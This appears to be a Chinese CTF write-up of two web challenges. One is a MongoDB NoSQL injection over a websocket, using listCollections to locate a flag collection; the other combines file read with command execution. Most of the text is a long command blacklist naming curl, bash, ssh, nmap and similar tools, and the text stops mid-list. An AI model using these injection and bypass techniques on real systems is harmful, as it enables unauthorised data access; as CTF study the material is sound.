前言
官方wp:https://hjug69b9j6.feishu.cn/docx/V02Rd3MyWoRPVxxTTCOcLutNnqe
Web
king (复现)
nohttp + nosql
进去是一个游戏,试了半天只有那个姓名框感觉有用,但是这玩意是前端,没抓到任何包。。。
{{ xp }}xp
{{ index != 0 ? upgrade.type != upgrades[index - 1].type ? upgrade.type : '' : 'Skills' }}
{{ upgrade.names }}
{{ upgrade.descriptions }}
Cost: {{ upgrade.cost }} {{ upgrade.type == "stat" ? 'xp' : 'gold' }}
+{{ upgrade.type == "stat" ? upgrade.increment : upgrade.damage }} {{ upgrade.metric }} 在网络里面发现通信请求
猜测注入点在这里,要抓websocket流,在bp自带的浏览器里面进入页面来抓包
经过测试,find可以换成其他命令
查一下官方文档,其中有一个listCollections命令:https://www.mongodb.com/docs/v6.0/reference/command/listCollections/
可以查询数据库的结构,返回当前数据库中所有的collection
其中有一个flag开头的集合,find获取其中的数据即可
readbooks
任意文件读取 + 构造linux命令执行
给了个/public路由和/list路由
测试发现list路由可以列出文件,public路由下是读取文件内容
这里居然可以用通配符
list列出发现有blacklist,public路由下读一下
逆天黑名单
r2pm,eu-strings,getenforce,hp-timedate,pyftmerge,edquota,gpic,getsebool,gjs,gpgme-json,airmon-ng,rubberband-r3,virt-install,cd-fix-profile,readelf.py,pvdisplay,pw-mididump,gnome-system-monitor,ebtables-save,uclampset,qemu-hexagon,estimator_ckpt_converter,cargo-fmt,extlinux,sgpio,cluster,nfsstat,rpyc_registry,alsamixer,xfwm4,avahi-browse,llvm-install-name-tool,exempi,VBoxBugReport,keyring,kpartx,nf-ct-events,webdumper,thin_delta,virt-tail,comm,sed,oLschema2ldif,cabextract,ifnames,amidi,gxl2dot,gcc-nm,orca,fsck.vfat,unshare,docker-credential-desktop,msgfmt3.py,tpm2_getcommandauditdigest,seq,tpm2_flushcontext,llvm-cxxfilt,plistutil,hspell-i,tesseract,stund,lxsudo,VGAuthService,ntfswipe,setregdomain,svnsync,rpmverify,upgrade_get_document,conf,zts-php,llvm-link,xmodmap,cd-iccdump,setlayout,chmem,desktop-file-edit,getsysinfo,nl-addr-list,dockerd,ether-wake,hwasan_symbolize,anthy-dic-tool-unicode,virtqemud,tabulate,tpm2_pcrread,constgrep,jdeps,docker-proxy,compare,quotasync,dnf,qemu-system-riscv64,guile2.2,ipmi-chassis,keditbookmarks,phd,tpm2_pcrallocate,autoupdate,gnome-calendar,kasumi-unicode,usermod,pppstats,unsquashfs,shasum,sordi,rootlesskit,include,alsactl,iso-info,colormgr,version,tpm2_policyrestart,ebtables-nft-restore,php,nftldump,pw-dump,afpcmd,xsetwacom,llvm-xray,inkscape,xdg-desktop-icon,pipenv-resolver,sudoedit,ntfsfix,gentrigrams,slick-greeter-set-keyboard-layout,pw-metadata,reindexdb,lwp-dump,rpcctl,mksdcard,xfs_rtcp,dmenu,gkbd-keyboard-display,domainname,hcxpcapngtool,nohup,clippy-driver,sefcontext_compile,solid-hardware5,pic,qemu-system-sh4eb,llvm-jitlink,ipmitool,colrm,handle-sshpw,systemd-cgls,dbus-daemon,unidecode,pg_controldata,iscsi-iname,vboxdtrace,localectl,msgcomm,kquitapp5,tss2_getappdata,dot,mke2fs,pip,b2sum,exiftool,qemu-system-mips64el,llvm-ar,llvm-lipo,llvm-as,ssh-keygen,radiff2,pcre2-config,png-fix-itxt,objdump,qemu-ppc64,pwqgen,gdk-pixbuf-query-loaders-64,isadump,anaconda,uvicorn,uvi,man.man-db,imageio_download_bin,cargo-clippy,tpm2_changepps,gnome-thumbnail-font,hb-subset,whatis.man-db,nl-link-list,lxqt-powermanagement,cd-info,yes,vlc-wrapper,slattach,rustdoc,qemu-system-x86_64,pwhistory_helper,nautilus-autorun-software,findfs,desktop-file-install,llvm-stress,msgconv,arj,virtstoraged,ark,deallocvt,smiquery,vgs,gslj,jupyter-notebook,arp,virt-sparsify,pathchk,setleds,gslp,ipmidetect,spellout,saved_model_cli,automake-1.16,pod2usage,vgimportdevices,ip6tables-restore,ntfscmp,pygettext2.7.py,vboximg-mount,brightnessctl,signonpluginprocess,make_f2fs,rsync-ssl,cancel.cups,kbuildsycoca5,icu-config,systemd-dissect,abrt-action-find-bodhi-update,pyrsa-priv2pub,bcache,cdda-player,ccmake3,dd,flash_unlock,i3-dmenu-desktop,login,rust-lldb,tlp-rdw,ntfsls,icu-config-64,brltty-prologue.tcl,rpyc_registry.py,e2undo,eu-stack,xdg-icon-resource,mozcerts-qt5,gpg,mmd,dnsdomainname,ps2pdf,asm,btrfs,printafm,luajit-2.1.0-beta3,abrt-action-analyze-oops,errno,cracklib-check,getpcaps,mvnDebug,lwp-request,virt-xml-validate,hexdump,dbxtool,listplugins,gnome-terminal,yaml2obj,mmount,flask,ooimpress,VBoxDTrace,lpmove,blkdeactivate,stapsh,gimp-test-clipboard-2.0,udevadm,startlxqt,flash_otp_lock,fc-conflist,atd,pip-3.11,aulast,gawk,gsnd,tcpdump,iecset,abrt-harvest-pstoreoops,qemu-mips,nl-cls-add,qemu-system-aarch64,prtstat,ctags,slugify,f2py3,rpc.gssd,lp_solve,kdumpctl,atq,cyclic,bootctl,gsl-randist,nl-route-add,jconsole,tpm2_duplicate,word-list-compress,eslint,selabel_partial_match,gnome-shell-perf-tool,sfv-hash,wnck-urgency-monitor,mount.ntfs-3g,macof,systemd-escape,optscript,testsaslauthd,hp-plugin-download,tpm2_dictionarylockout,fixfiles,keyring-python3,ntfsclone,sdiff,openbox-session,jps,gnome-calculator,virtnodedevd,xtables-nft-multi,hp-align,dmesg,jupyter-nbconvert,pidof,lxqt-config-powermanagement,rpm2archive,malcontent-control,flipdiff,.keepme,iconvconfig,amuFormat.sh,lnstat,openal-info,grub2-menulst2cfg,createdb,piv-tool,pdftoppm,filan,hwinfo,suexec,wwan,journalctl,isql-fb,vgcreate,cupsenable,virtnetworkd,gpg-wks-server,samba-regedit,qemu-riscv32-static,vmware-hgfsclient,desktoptojson,eu-ar,pyinotify,ifenslave,xdg-settings,tth-hash,vgchange,dazzle-list-counters,grub2-mklayout,curl,turbostat,lsblk,rahash2,tpm2_policycphash,dua,gxl2gv,anaconda-cleanup,pkcon,nl-qdisc-delete,pkill,zstdless,scour,flutter_console.bat,dhclient-script,gpre,duf,wpa_cli,pg_rewind,hangul,lvremove,lesskey,aureport,gids-tool,makeivs-ng,sumtool,brltty-hid,psfstriptable,apachectl,vlc,javac,virt-sysprep,avahi-resolve-address,xprop,tpm2_unseal,fuse-overlayfs,bzcmp,kdeinit5_wrapper,zmore,cupsdisable,grub2-syslinux2cfg,gtf,sshd,tune.exfat,javap,pax11publish,gamemoded,awk,qemu-i386-static,switch_root,tpm2_policypassword,flash_eraseall,gdbus-codegen,msgcmp,mkdir,libguestfs-make-fixed-appliance,lusermod,nl-neightbl-list,ghidra_10.2.3_PUBLIC,scrub,obj2yaml,bluetooth-sendto,whatis,parecord,disasm,mountstats,autom4te,rougify,ctest3,crun,minfo,mkfs.fat,llvm-strip,vboxballoonctrl,openbox,grl-launch-0.3,systemd-nspawn,docker-index,gvpr,airdecloak-ng,gr2fonttest,mrd,hp-colorcal,rpmquery,gtscompare,ip6tables-restore-translate,selinux_check_access,lpr.cups,libinput,VBoxHeadless,llvm-objdump,sleep,pg_restore,tss2_setcertificate,nl-list-sockets,jobb,send2trash,pango-list,syslinux,gtk3-widget-factory,brltty-genkey,egk-tool,wmf2fig,gnome-extensions,ragg2,c89,ibus-daemon,convert-caffe2-to-onnx,jupyter-events,sos,jpackage,smbtar,semodule_package,namei,dwp,alsaloop,fallocate,serialver,msgfmt,iptables-translate,install-catalog,dirmngr-client,gtshapprox,genpmk,cvtsudoers,hb-ot-shape-closure,xdriinfo,nl-route-get,has160-hash,chgrp,kernel-install,dwz,ntfsfallocate,xdg-email,setmetamode,pkgconf,brave-browser-stable,tpm2_readclock,tabs,nandwrite,newusers,stream,dos2unix,jupyter-nbextension,e2fsck,oomctl,strace-log-merge,exiv2,dotenv,expo-cli,dnstap-read,llvm-windres,c99,llvm-otool,tpm2_clockrateadjust,tss2_decrypt,unzip,colcrt,bunzip2,showkey,loginctl,nmap,bridge,qemu-ppc-static,pg_test_timing,nameif,mkfs.vfat,i3status,recv_image,wmf2x,sqlite3,speak-ng,srec_info,rcvboxautostart-service,halt,tpm2_clear,xfs_quota,fsadm,VBoxVRDP,gwenview_importer,nl-link-set,nsenter,biosdecode,reporter-ureport,gdisk,jupyter-nbclassic-serverextension,mtr,ges-launch-1.0,mount.lowntfs-3g,applyplugin,AUTHORS,amixer,uuid,.ci.yaml,dropdb,vmhgfs-fuse,spa-json-dump,Xorg,notify-send,tkiptun-ng,mmcli,ssh-add,catman,tpm2_create,selabel_digest,bzip2,ionice,scanimage,nfsiostat,xfs_ncheck,xfce4-im-chooser,grub2-editenv,rebuild-jar-repository,mkhomedir_helper,clevis-luks-unbind,cd-paranoia,timedatectl,qemu-riscv32,ntfstruncate,ebtables,qemu-img,clevis-luks-edit,hcxhashtool,easyocr,lpq.cups,osirrox,udisksctl,quotaon,javadoc,vgsplit,mount.ntfs,gvpack,abrt-action-save-package-data,tapset,ed2k-link,gnome-disks,arping,xbrlapi,lvresize,clevis-luks-pass,machinectl,bugpoint,hostapd_cli,getpidprevcon,blockdev,ulockmgr_server,eject,ipmi-sensors-config,portablectl,speech-dispatcher,pygmentize,ptx,tpm2_policycommandcode,ntfsresize,icuinfo,hypervvssd,qemu-system-loongarch64,ssh,ravc2,bash,clang++-16,nl-fib-lookup,mmdbresolve,mvn,ausyscall,vgreduce,xls2csv,swapoff,diff-jars,gcm-viewer,PATENT_GRANT,2to3,svlc,llvm-mc,acyclic,python2.7,fix-info-dir,tpm2_send,bashbug,efibootdump,vgconvert,pathfix3.11.py,regtree,VBoxClient,userhelper,jupyter-kernel,llvm-ml,reporter-systemd-journal,vgdisplay,westcos-tool,scriptlive,cardos-tool,vmcore-dmesg,resizepart,llvm-mt,lxqt-config-appearance,nm,clevis-luks-list,wpexec,dm-tool,jcmd,arptables-nft-save,setfiles,mwm,rfddump,pldd,gtk4-broadwayd,mkfs.msdos,android-studio,dnsmasq,firewall-cmd,tpm2_policynamehash,ntfsinfo,sedismod,java2html,llvm-dwarfutil,qemu-riscv64-static,import,showconsolefont,gcr-viewer,pf2afm,plymouth-set-default-theme,ktelnetservice5,column,grub2-file,ntfs-3g,llvm-nm,bzless,danetool,lxqt-globalkeysd,glxinfo,get-iab,pvs,extract_chmLib,cisco-decrypt,gtstemplate,gapplication,gtk3-demo-application,fsck.exfat,vncconfig,abrt-cli,tss2_gettpmblobs,zvbid,cracklib-unpacker,rtkitctl,uuidparse,azure_data_disk_setup.sh,virtualboxvm,pzstd,sum,xzmore,getcifsacl,qemu-riscv64,dunstify,streamlit.cmd,gamemode-simulate-game,hp-clean,i386,qtpy,nfsdclnts,john,editdiff,veracrypt,sosreport,gsf-office-thumbnailer,nf-log,pwn,sshmitm,gbak,restorecon_xattr,chm_http,xdg-mime,watchfiles,run-with-aspell,smicache,desktop-file-validate,convert,smbcquotas,sedispol,thin_repair,svn,zforce,pinentry,fsfreeze,e2image,usb-devices,x86_energy_perf_policy,pigz,cryptoflex-tool,chkconfig,simple-scan,llvm-PerfectShuffle,build-classpath,join,tpm2_load,plymouth,pipewire-vulkan,randpkt,python-config,arpaname,mako-render-3.11,diff-so-fancy,dnscrypt-proxy,build-jar-repository,vgimportclone,tail,x86_64-redhat-linux-gnu-pkg-config,pngfix,sync,tpm2_shutdown,sha1sum,redland-db-upgrade,dbus-monitor,lpadmin,blkzone,showimage2,easy_install,llvm-cxxmap,hcxpmktool,ps2ps2,wpaclean,nano,chpasswd,qemu-sparc64-static,pw-jack,virt-manager,htpasswd,clevis-encrypt-sss,vgexport,xorriso-dd-target,abrt-action-generate-core-backtrace,filefrag,sha384sum,mklost+found,systemd-stdio-bridge,debuginfod-find,lxqt-config-file-associations,pwnstrip,qcatool-qt5,reporter-bugzilla,fbsvcmgr,rapper,ip6tables-nft-save,setpriv,fuse2fs,ntfsmount,cupstestppd,thermald,update-gtk-immodules,stl2gts,jarsigner,.gitignore,pygettext3.11.py,ssh-keyscan,pacat,qemu-system-sparc64,blkmapd,yum,llvm-rc,eu-elfcmp,driverless-fax,opensnitchd,NOTICE.txt,brltty,dumpkeys,tload,abrt-action-check-oops-for-hw-error,convert-onnx-to-caffe2,nautilus,mvxattr,unique,source-highlight-esc.sh,syntax_suggest,tpm2_setcommandauditstatus,fusermount,passt.avx2,systemd-tmpfiles,mmdblookup,view,multispell,com.docker.cli,convert_hd,bond2team,bundler,sssd,setenforce,zvbi-chains,hp-levels,qemu-alpha-static,cupsfilter,clang-cl,tpm2_nvread,gnroff,htcacheclean,tcpkill,virt-clone,ss,fsck.hfs,sgmlwhich,cd-create-profile,cache_restore,bat,su,grub2-macbless,symlinks,ldmtool,ts_uinput,sx,sz,epiphany,tpm2_nvextend,wdctl,localedef,waybackpack,brave-browser,hp-testpage,eu-nm,hypervkvpd,llvm-extract,svndumpfilter,emulator-check,mount.fuse,qemu-system-or1k,create_ap,quotaoff,lp.cups,tc,pipewire-aes67,qemu-m68k,swtpm,tpm2_commit,split,utmpdump,broadwayd,qemu-aarch64,pg_upgrade,filterdiff,brltty-ktb,VBoxService,lxqt-sudo,gtsdelaunay,fusermount-glusterfs,rfdformat,i3-save-tree,groupadd,ebtables-nft,tss2_pcrextend,grub2-set-password,xfs_fsr,update-desktop-database,devlink,thin_rmap,tpm2_setprimarypolicy,supervisor,restorecon,qemu-hexagon-static,legal,vgrename,truncate,monitor,vigr,hb-shape,mk_isdnhwdb,VBoxBalloonCtrl,svndiffview,openvt,nm-connection-editor,semodule_expand,spice-vdagentd,gprof,catdoc,rmdir,antiword.bin,thin_check,pg_archivecleanup,.github,setvtrgb,gdk-pixbuf-csource,kscreen-doctor,mkdumprd,badblocks,pdfinfo,llvm-c-test,pppoe-discovery,ppdhtml,flash_otp_info,pvscan,x86_64-redhat-linux-g++,systemd-hwdb,dnie-tool,aulastlog,dump-acct,pam_timestamp_check,hydra-wizard.sh,vmware-alias-import,rasm2,rafind2,update-crypto-policies,json_reformat,fc-query,fbtracemgr,TESTOWNERS,xdg-screensaver,bro-perl,thin_metadata_unpack,mapscrn,brltty-lsinc,nethogs,eu-objdump,zipnote,smartctl,systemd-analyze,initdb,eu-elfcompress,raid-check,man-recode,update-pciids,lxqt-config,gnome-text-editor,koi8rxterm,hardlink,qemu-microblazeel,systemd-id128,pwunconv,p11tool,tset,hprof-conv,tss2_setappdata,cmake3,check-regexp,automake,pkcs15-init,tss2_createkey,lexgrog,pipewire-avb,pysemver,pavucontrol,tpm2_rsaencrypt,ping,mkfs.xfs,vmware-checkvm,groupdel,ld.gold,less,iptables-nft,ispell,auditctl,pip2,nslookup,afpgetstatus,pip3,sdkmanager,create-cracklib-dict,ntfscluster,avahi-resolve-host-name,enchant-2,msgsnarf,xfs_freeze,brltty-setcaps,dmsetup,pstree,clevis-decrypt-tang,mkbitmap,killall,zstdmt,fincore,tpm2_nvcertify,nl-link-name2ifindex,kdeinit5,sensors,degit,qemu-sparc,pwqfilter,elfdiff,mount.glusterfs,qemu-system-xtensaeb,edgepaint,lto-dump,pipreqs,xfs_mdrestore,gtk-query-settings,start-statd,pw-dot,sestatus,kbdinfo,applygnupgdefaults,kexec,gtk3-icon-browser,imsettings-list,VBoxDRMClient,dircolors,nl-link-stats,xz,jdiff,pw-dsdplay,tss2_exportkey,tpm2_getcap,ipptool,accton,brltty-ttb,airbase-ng,lchfn,setxkbmap,llvm-ranlib,prezip-bin,gamemoderun,wesside-ng,pastebin,cpanel_json_xs,qemu-mipsn32el-static,xfs_admin,pidstat,tpm2_evictcontrol,gtar,lvmdiskscan,zipsplit,xorrisofs,autoconf,pipx,repquota,gdm-screenshot,xfwm4-settings,brltty-lscmds,arp-scan,renew-dummy-cert,avcstat,cache_repair,gnutls-cli-debug,guile-tools2.2,tcpslice,serdi,virt-builder,tpm2_pcrevent,fprintd-verify,gtk-query-immodules-3.0-64,b43-fwcutter,llvm-addr2line,vmware-namespace-cmd,ownership,smbspool,grub2-mkstandalone,dunstctl,rust-analyzer,nvlc,twopi,pvremove,mkfontscale,pg_test_fsync,binwalk,gtbl,clevis-encrypt-tpm2plus,tpm2_readpublic,ipmi-console,aclocal,systemd-detect-virt,lsscsi,jose,build-classpath-directory,gnome-tweaks,mutagen-inspect,hex,lvcreate,qemu-mipsn32-static,hfs-bless,systemd-creds,vmtoolsd,xclip-copyfile,hspell,nl-rule-list,mshowfat,lxqt-archiver,ipmiping,cheese,airserv-ng,usleep,ipcs,lpstat.cups,virt-index-validate,abrt-merge-pstoreoops,xdpyinfo,ostree,fpaste,tpm2,nvme,plymouthd,cdrecord,swapon,lvchange,bin,virt-filesystems,pasuspender,i3-with-shmlog,vm-support,tpm2_policyauthorize,shade-jar,avahi-publish-address,gnome-photos,make-bcache,rygel,vs_code_context_menu.sh,airtun-ng,qemu-cris,pytesseract,cifsiostat,pftp,readlink,pw-inspector,ausearch,tss2_getrandom,abrtd,sha512hmac,dosfslabel,avahi-browse-domains,llvm-cat,imsettings-info,scapy,cleanup.sh,smtpd2.py,tpm2_geteccparameters,gnome-extensions-app,nokogiri,lvmdevices,arecordmidi,mmove,tac,cpio,create-jar-links,wvgain,ntfssecaudit,cupsctl,qbittorrent,traceroute,mtools,systemd-delta,troff,register-python-argcomplete,qemu-nios2-static,setup-nsssysinit,dpl4hydra.sh,dbus-test-tool,autoreconf,pw-profiler,vmware-toolbox-cmd,wish8.6,tar,isaset,abrt,system-config-language,wpctl,kpackagetool5,sprof,cupsaccept,mtdpart,msgfmt2.7.py,catppt,pw-mon,clevis-decrypt-tpm2,sha256sum,tracker3,ppdpo,sqfstar,plocate-build,tss2_writeauthorizenv,isosize,qemu-ppc64-static,fsck.ext2,clusterdb,secon,fsck.ext3,gtk-query-immodules-2.0-64,fsck.ext4,rarun2,mimeopen,tpm2_nvincrement,x86_64-redhat-linux-gcc-13,readprofile,gsdj500,spice-webdavd,tmon,tpm2_checkquote,systemd-notify,tpm2_changeeps,logrotate,gcc-ranlib,tbl,alsa-info.sh,nfsref,fsck.btrfs,blkid,lessecho,tss2_import,CONTRIBUTING.md,gsettings,kglobalaccel5,unshadow,visudo,bundle,gts2xyz,parec,source.properties,btrfstune,smbprint,xsltproc,rcvboxdrv,btrfs-image,sotruss,faillock,lzop,pacmd,vipw,hp-diagnose_queues,sqlitebrowser,gethostip,nfc,cupsreject,xfs_mkfile,wmctrl,tpm2_zgen2phase,mkfs.jffs2,grubby,tpm2_policysigned,grub2-mknetdir,cd-drive,xfs_logprint,iptables-restore-translate,wsdump,jffs2dump,mkfs,cpack,jupyter-console,archquery,python2,systemd-repart,ffprobe,NetworkManager,python3,genl,regdiff,nft,swtpm_localca,jhsdb,ts_verify,g++,nm-applet,pdfunite,rmcpping,xfwm4-tweaks-settings,qemu-armeb-static,rygel-preferences,opensc-tool,nl-link-release,qemu-mipsel-static,llvm-exegesis,virt-customize,pyrcc5,intel-speed-select,mcookie,curve_keygen,grub2-fstest,sudoreplay,jupyter-troubleshoot,hg-ssh,llvm-rtdyld,mlabel,rmmod,gnome-control-center,tss2_verifysignature,scriptreplay,hp-makeuri,phar.phar,nl-qdisc-list,hddtemp,shellcraft,pvresize,crontab,hp-scan,espeak-ng,dump.exfat,pdfattach,npm-watch,dbus-binding-tool,qrap,vboxconfig,gpg-error,hp-setup,opensc-explorer,chronyc,libpng16-config,chronyd,qemu-sparc32plus,c++filt,systemctl,opensc-asn1,vncviewer,ip6tables,mimetype,msgexec,okular,tee,qemu-system-tricore,clevis-encrypt-null,pydoc3.11,xmbind,flatpak-coredumpctl,driverless,systemd-path,makedumpfile,tsig-keygen,tune2fs,systemd-sysusers,ipmi-sensors,e2freefrag,pkaction,era_restore,l2ping,zramctl,thin_trim,flash_otp_erase,pw-reserve,abrt-dump-journal-xorg,meld,sqlite,abrt-action-analyze-backtrace,nf-exp-add,sm-notify,ts_finddev,mformat,sccmap,poweroff,python3-config,tpm2_clearcontrol,pdfseparate,pod2man,llvm-size,pivot_root,ldconfig,hpcups-update-ppds,whereis,llvm-jitlink-executor,tss2_quote,lvreduce,geqn,clevis-luks-bind,tiger-hash,ipcalc,xmlcatalog,gtscheck,mdevctl,skill,nl-classid-lookup,ntfsmove,supermin,tpm2_policycountertimer,hexchat,systemd-sysext,named-compilezone,rootlesskit-docker-proxy,cvlc,hivexregedit,lsinitrd,env,jsonschema,pyserial-ports,wipefs,sharesec,zdb,osinfo-db-export,slick-greeter,mtdinfo,update-alternatives,pw-link,pg_amcheck,head,VirtualBoxVM,ping6,systemd-ac-power,pwmake,appstreamcli,regshell,combinedeltarpm,saslpasswd2,stap,dsniff,vimtutor,switcherooctl,eog,teamd,instperf,clock,dbus-uuidgen,stat,tss2,thin_metadata_size,preconv,postgresql-new-systemd-unit,magick-script,pgrep,tss2_delete,mshortname,gresource,src-hilite-lesspipe.sh,hp-info,tpm2_gettestresult,alternatives,lxqt-config-globalkeyshortcuts,pngcheck,zdiff,rustup,httpd,tgz,brltty-mkuser,ntfsdecrypt,lvscan,pgbench,jupyter-qtconsole,kshell5,jupyter-bundlerextension,fc-cache,pathfix.py,guestmount,pinfo,containerd-shim-runc-v1,containerd-shim-runc-v2,canberra-boot,fdisk,llvm-split,dbus-send,abrt-auto-reporting,nologin,macchanger,pdftocairo,fwupdmgr,ntfsmftalloc,page_owner_sort,tmux,iptunnel,tss2_getdescription,nl-route-list,logger,volumeicon,glusterfsd,rpc.statd,nsupdate,gnome-maps,sgdisk,gnome-disk-image-mounter,pyasn_util_asnames.py,smtpd2.7.py,pdf2dsc,ts_test_mt,wmf2gd,qemu-system-mips64,clevis-pin-tpm2,llvm-ifs,auditd,wifijammer,qemu-mipsel,heif-enc,gnome-shell-extension-tool,tic,stap-report,setcifsacl,batch,sha256hmac,zenity,ttmkfdir,linux32,tss2_getinfo,zipdetails,system_analyzer,gzip,swtpm_setup,systemd-socket-activate,gcalccmd,wifi,zfs,mkrfc2734,qemu-xtensaeb-static,eqn,vimdiff,cpupower,mpris-proxy,evince,prune,update-mime-database,swaplabel,wlancap2wpasec,xdg-user-dir,g13,xdg-desktop-menu,reporter-print,tpm2_getsessionauditdigest,tput,vpnc-disconnect,tpm2_createak,pactl,clang-cpp,reporter-upload,xargs,keytool,sasldblistusers2,firewall-config,erb,fsck.minix,dumpcap,interdiff,virsh,gupnp-dlna-info-2.0,pwconv,groupmod,clevis-luks-regen,besside-ng,realpath,pre-grohtml,nl-cls-list,lchsh,kbookmarkmerger,doxyindexer,atrm,brltty-morse,abrt-action-analyze-c,tpm2_stirrandom,VBoxAutostart,display,humanfriendly,qli,abrt-dump-oops,soelim.groff,easy_install-2.7,qemu-s390x,pg_dump,tracepath,zipcloak,tshark,virt-ssh-helper,tpm2_ecephemeral,cups-browsed,soffice,fsck.ntfs,phpize,smbclient,whirlpool-hash,uuidgen,systemd-firstboot,gst-launch-1.0,ndctl,ps2pdfwr,virt-edit,podboat,get-oui,magick,fastboot,rtstat,skdump,source-highlight,emulator,recountdiff,aplaymidi,intel-virtual-output,ethtool,msgunfmt,runuser,zic,firebird,mkdosfs,jupyter-nbclassic-bundlerextension,gdb-add-index,llvm-symbolizer,fczipinfo,graphml2gv,linux64,btmgmt,svnlook,basenc,nop,cache_metadata_size,btrfs-convert,tlp,xterm,cache_check,xdg-user-dirs-gtk-update,logresolve,hb-view,update,jupyter,zip,wayland-scanner,grepdiff,vboxheadless,gimp-2.10,attr,gnome-session-inhibit,mesg,flash_erase,hcxhash2cap,rust-gdbgui,llvm-lib,trietool-0.2,VirtualBox,ndptool,smidiff,tpm2_hierarchycontrol,addgnupghome,mattrib,fstrim,node-supervisor,qemu-system-sh4,getfacl,ruby-mri,jmap,ntfs-3g.probe,vboxbugreport,ld.bfd,pinky,npm,mailsnarf,staprun,lesspipe.sh,dmstats,lsiio,fixparts,qemu-mipsn32,mkfs.ext2,mkfs.ext3,capinfos,mkfs.ext4,xscreensaver-command,sss_ssh_knownhostsproxy,i3lock,pwqcheck,im-chooser,npx,smixlate,telinit,lvrename,padsp-32,llvm-pdbutil,expo,resize2fs,tss2_getcertificate,ooviewdoc,svnrdump,expr,flex,rsync,mzip,pluginviewer,qemu-microblaze-static,grub-customizer,phononsettings,python3.11-x86_64-config,wheel,terminator,luksmeta,tpm2_createek,nanddump,gparted,unzipsfx,swtpm_cert,aserver,anthy-morphological-analyzer-unicode,tifffile,augenrules,lsmdev,hexedit,oodraw,certtool,svnserve,tpm2_certifycreation,gtk-launch,rnano,cupsd,partprobe,grub2-kbdcomp,rtcwake,tpm2_sign,zstd,gettext,rhash,gnome-session,oomath,lwp-download,text2pcap,gvmap,qemu-ga,qsb-qt6,route,request-key,setcap,iptables-save,llvm-cov,zsoelim,p11-kit,toe,pip-3,fsck.hfsplus,yelp,xzdiff,sushi,hp-probe,libieee1284_test,dmevent_tool,logsave,tpm2_getpolicydigest,llvm-modextract,top,flatpak,btrfs-map-logical,sshow,VBoxClient-all,clevis-decrypt-sss,sshtunnel,tor,gpgtar,docfdisk,qemu-system-arm,getent,gvgen,audit2allow,atrun,wpa_supplicant,smartd,memdiskfind,wpscan,mkdict,ts_conf,rview,semodule,besside-ng-crawler,nf-exp-delete,iconv,btmon,apkanalyzer,soundstretch,airventriloquist-ng,plocate,fuck,gpasswd,btrfs-select-super,dsymutil,xfs_info,eu-addr2line,xinit,qemu-system-alpha,lxqt-config-session,rabin2,test_chmLib,eutp,import_pb_to_tensorboard,iptc,guestfish,lchage,kde-geo-uri-handler,qemu-sh4,qemu-pr-helper,vgextend,nl-neigh-add,recode-sr-latin,flexiblas,xclip-pastefile,avahi-set-host-name,flashrom,dartdoc_options.yaml,pvmove,brltty-config.sh,gssproxy,gv2gml,nl-monitor,Xvnc,nsec3hash,jupyter-nbclassic,ipmiconsole,selinuxconlist,ccmake,unix2mac,mpartition,smbcacls,aireplay-ng,pkcheck,msgen,mke2fs.conf,fb_lock_print,nping,mcomp,gnome-keyring,grub2-glue-efi,qemu-io,obs-ffmpeg-mux,tpm2_policytemplate,ntl,alsaunmute,qemu-system-mips,jstack,jupyter-execute,dracut,azote,run-on-bat,groff,clockdiff,xml2-config,bluetooth,xscreensaver-settings,lscpu,ntfslabel,tpm2_selftest,xfs_metadump,sctp_status,pmap,i3-dump-log,grub2-script-check,qemu-m68k-static,trust,qemu-microblazeel-static,qemu-ppc64le,zstdgrep,satyr,infotocap,pkmon,lightdm-gtk-greeter,php-cgi,qemu-trace-stap,lxqt-config-input,psfxtable,pvcreate,newuidmap,convertquota,airdecap-ng,gpg-wks-client,coloredlogs,abrt-action-trim-files,partx,genhomedircon,usbhid-dump,airodump-ng,units,iptables,tss2_nvincrement,luac,ip6tables-save,pstack,renice,modprobe,xscreensaver,sha512sum,gst-typefind-1.0,etc1tool,pvchange,packetforge-ng,toco_from_protos,named-nzd2nzf,qemu-mips64el-static,fsck.fat,file,git-upload-pack,gpio-watch,logname,tss2_createnv,nmtui-connect,qemu-arm,ps2epsi,xorriso,sdparm,uncurl,tpm2_createprimary,units_cur,monkeyrunner,adcli,virt-tar-out,qemu-i386,vmware-vgauth-cmd,abrt-action-analyze-ccpp-local,rpcinfo,jp.py,genl-ctrl-list,virtlockd,trietool,autoheader,unexpand,setfont,iso-read,ifconfig,mtr-packet,nf-monitor,qemu-sh4eb,lsgpio,dbus-update-activation-environment,qemu-system-avr,VBoxAudioTest,readelf,tss2_provision,printenv,tpm2_startauthsession,exfatlabel,mm2gv,tpm2_ecdhkeygen,xapp-gpu-offload,modulemd-validator,lsipc,virt-pki-validate,rpyc_classic,tpm2_print,imageio_remove_bin,ipset-translate,idle2,nl-link-enslave,lowntfs-3g,abrt-action-analyze-java,ldattach,dmenu_path,mount.cifs,conjure,qemu-ppc64le-static,mcopy,perldoc,gneqn,cpp2html,unused_70-wifi-wired-exclusive.sh,gtester,grpconv,ttx,report-cli,tty,find,nisdomainname,shuf,xfs_spaceman,kdeinit5_shutdown,checksec,virtinterfaced,ghostscript,qemu-system-ppc,gcm-inspect,vgck,auvirt,cargo,rmcp-ping,glib-genmarshal,systemd-cat,date,zdump,pdfimages,cd-read,.vscode,procan,brltty-ctb,ipmi-power,oobase,iptables-nft-restore,hp-query,losetup,enchant-lsmod-2,gnome-keyring-daemon,sqlmap,ps2ascii,vtscan,chat,gnome-shell-extension-prefs,python,ebtables-nft-save,transmission-remote,fold,mkfs.exfat,pg_basebackup,ppdc,tpm2_encodeobject,remmina,sancov,editcap,setarch,template,mount.nfs4,ppdi,pef-config,android,coredumpctl,virt-copy-out,abrt-action-list-dsos,zsh,ipmi-raw,lxqt-panel,aplay,lnewusers,soelim,mkfs.ntfs,umax_pp,konsole,aconnect,wish,lsirq,eu-elfclassify,dunst,VBox,asn1Parser,nproc,arptables-nft,zoxide,distro,crond,xfs_db,checksctp,appstream-util,virt-format,md5sum,brltty-prologue.lua,bwrap,nandflipbits,pdfcrack,invoke3,aspell,qemu-system-nios2,gts2dxf,kpackagelauncherqml,unix_chkpwd,fwupdtool,xss-lock,pslog,fonttools,ranlib,virt-inspector,grub2-reboot,spice-vdagent,tpm2_makecredential,semodule_unpackage,i3-config-wizard,nmtui-edit,resolvconf,rtacct,llvm-diff,audit2why,ktrash5,nl-class-add,dmtracedump,tss2_list,glib-gettextize,userpath,modinfo,i3-migrate-config-to-v4,loadkeys,llvm-reduce,bzfgrep,virt-drivers,hypervfcopyd,pvck,msgfmt.py,llvm-lto,obconf,qemu-ppc,mknod,xauth,evmctl,homectl,mkisofs,ipmi-oem,dmenu_run,grub2-setpassword,pw-encplay,llvm-bitcode-strip,virt-copy-in,i